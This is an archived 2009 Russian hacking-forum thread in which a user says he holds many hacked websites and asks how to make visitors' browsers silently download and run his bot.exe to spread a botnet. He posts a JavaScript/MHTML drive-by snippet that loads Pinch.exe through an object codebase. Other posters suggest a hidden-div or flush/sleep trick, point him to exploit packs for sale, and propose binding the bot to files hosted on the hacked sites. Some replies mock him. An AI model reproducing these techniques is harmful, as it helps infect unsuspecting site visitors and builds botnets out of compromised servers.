PDA

Просмотр полной версии : HTML, помогите советом.


coolZIRO
22.04.2009, 17:34
Здравствуйте, подскажите, как сделать так что бы файл грузился и запускался вместе с сайтом, то есть грузиться сначала файл потом файл запускается и дальше грузиться сайт. Хочу подобным методом бота распространить.
Я, что то слышал, но не помню возможно PHP скрипт

nonamez
22.04.2009, 17:36
а хтмл разве токое умее?? эт те однозначно пхп нуно, хтмл говоря на простом языке просто украшает...

coolZIRO
22.04.2009, 17:41
Значит PHP, можете выложить подобный скрипт загрузки и запуска. У меня просто есть кучя взломанных сайтов внедрив в которые этот скрипт и залив бота в директорию его можно оч удобно распространять.

Balvan
22.04.2009, 17:43
Обана, я тоже хочу через html ботнет построить! И ни каких тебе связок и т.п. заморочек! Научите а?!

XD

coolZIRO
22.04.2009, 17:53
КОроче в теории должно быть так: человек заходит на взломанный сайт вместе со всякими картинками из директории сайта грузиться и мой bot.exe и запускается. Как это реализовать?

Zedi
22.04.2009, 19:07
1.всю страницу взять в скрытый div и при полной загрузке этот div делать видимым
2.можно так ж сделать вывод загрузки bot.exe, flush() и тут ж sleep(), но тут не прогадаешь за сколько загрузится этот файл

m0Hze
22.04.2009, 19:31
А непрошели вытащить код из связок,затем добавить чтото вроде,onload и уже от сюда плясать.Ведь над связками работают долго,и там все проработано до мелочей,заче писать велосипед?

coolZIRO
22.04.2009, 19:31
Я не очень в это селен можешь пожалуйста все оформить как все должно быть что бы просто всавить в index и прописать путь к файлу.

m0Hze
22.04.2009, 19:35
Никто за тебя ничего писать небдет за бесплтано. Предложиш цену,найдуться и те кто напишут и оформят,и загрузят.

coolZIRO
22.04.2009, 19:43
)))

coolZIRO
22.04.2009, 20:47
А может както с помощью JS
IME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64

<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>')
}
setTimeout("malware()",150)
</script>

Чет типо того. как правельно сделать?

m0Hze
22.04.2009, 21:47
Да никак ты такое не сделаеш без палева пользователя.
Если только искать уязвимости в самих браузерах.

Karantin
22.04.2009, 23:14
Да никак ты такое не сделаеш без палева пользователя.
Если только искать уязвимости в самих браузерах.
+++++
Загрузка файла без палева с помощью эксплоитов, ищи связки в паблике (старые как правило, с мизерным пробивом) или покупай приватные. Если на сайтах есть фалы для загрузки - клей с ними свой бот и лей обратно на сайт.

seofilms
30.05.2009, 22:43
CoolZiro ты НУБ by Crazy ;)

astrologer
30.05.2009, 23:06
<!doctype html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Иксплоет</title>
</head>
<body>
Здраствуйте, я вот начинающий хакир и мне очень нужна ваша помощь!
Скачайте пожалуйста этот <a href="z.exe">файл</a> и запустити
что бы я распространил своего бота, очень срочна надо
только перед этим отключите антивирусы, ато ничего не получиться,
я не буду делать ничего плохого, чесно-чесно!
</body>
</html>

IWantBeautifulLife
31.05.2009, 15:30
CoolZiro ты НУБ by Crazy
+1
CoolZiro, дружище, это называется эксплоит и реализуется через уязвимости в браузерах.А еще бывают дяди, что объединяют несколько эксплоитов в паки (связки) и продают за большие денюжки, я являюсь счастливым обладателем YES exploit pack'а за 700$ :cool: